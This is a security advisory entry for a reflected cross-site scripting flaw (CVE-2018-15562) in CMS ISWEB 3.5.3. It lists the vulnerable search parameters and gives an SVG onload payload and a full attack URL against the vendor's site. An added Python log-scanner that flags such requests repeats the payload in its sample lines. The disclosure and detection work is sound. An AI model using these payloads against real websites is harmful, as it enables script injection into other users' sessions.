packetstorm | Thiago Sena | PACKETSTORM:149109
Aug 28, 2018 - 12:00 a.m.

CMS ISWEB 3.5.3 Cross Site Scripting

packetstormsecurity.com

EPSS: 0.001 (percentile: 36.5%)

`CMS ISWEB 3.5.3 Reflected XSS  
  
> CVE  
  
CVE-2018-15562  
  
> Vulnerable parameters:  
  
ordineRis  
sezioneRicerca  
oggettiRicerca  
  
> PoC screenshot: https://i.imgur.com/5YpESoC.png  
  
> Vendor of Product  
http://www.isweb.it  
  
  
> Attack Type  
Remote  
  
> Attack Vectors  
Payload:"><svg/onload=alert(String.fromCharCode(88,83,83))>  
URL: http://www.isweb.it/index.php?azione=cerca&id_sezione=505&ordineRis=default&sezioneRicerca=505&oggettiRicerca="><svg/onload=alert(String.fromCharCode(88,83,83))>  
  
> Discoverer  
Offensive0Labs - Thiago "thxsena" Sena & Rafael Fontes Souza  
  
  
`
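
An added example, not part of the original advisory: a log check that flags requests in which the three parameters listed above carry HTML markup characters after URL decoding, including double-encoded values. The combined log format, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Parameters the advisory lists as reflected.
WATCHED = {"ordineRis", "sezioneRicerca", "oggettiRicerca"}
# Characters that close an HTML attribute or open a tag.
MARKUP = re.compile(r"[<>\"'`]")
# Request target inside a combined-format access log line (assumed format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, max_rounds=3):
    """URL-decode repeatedly so double-encoded input (%2522) is still seen."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_params(log_line):
    """Return {param: decoded value} for watched params that carry markup."""
    match = REQUEST.search(log_line)
    if not match:
        return {}
    # Some servers log a raw quote as \x22; normalise that to %22 first.
    target = re.sub(r"\\x([0-9A-Fa-f]{2})", r"%\1", match.group(1))
    hits = {}
    for name, raw in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        value = fully_decode(raw)
        if name in WATCHED and MARKUP.search(value):
            hits[name] = value
    return hits

def scan(lines):
    """Return (line number, hits) for every line with a flagged parameter."""
    results = ((n, suspicious_params(line)) for n, line in enumerate(lines, 1))
    return [(n, hits) for n, hits in results if hits]

BASE = '203.0.113.7 - - [28/Aug/2018:10:00:00 +0000] "GET /index.php?azione=cerca&id_sezione=505&'
TAIL = ' HTTP/1.1" 200 5120'
SAMPLE_LOG = [  # constructed log lines, not taken from a real server
    BASE + "ordineRis=default&sezioneRicerca=505&oggettiRicerca=bando+di+gara" + TAIL,
    BASE + "ordineRis=default&sezioneRicerca=505&oggettiRicerca=%22%3E%3Csvg/onload=alert(String.fromCharCode(88,83,83))%3E" + TAIL,
    BASE + "ordineRis=default&sezioneRicerca=%2522%253Etest&oggettiRicerca=x" + TAIL,
    BASE + "ordineRis=\\x22%3Etest&sezioneRicerca=505&oggettiRicerca=x" + TAIL,
]

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

A hit only shows that markup reached one of these parameters; whether it was reflected unencoded depends on the response, so flagged requests still need review against the affected version.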
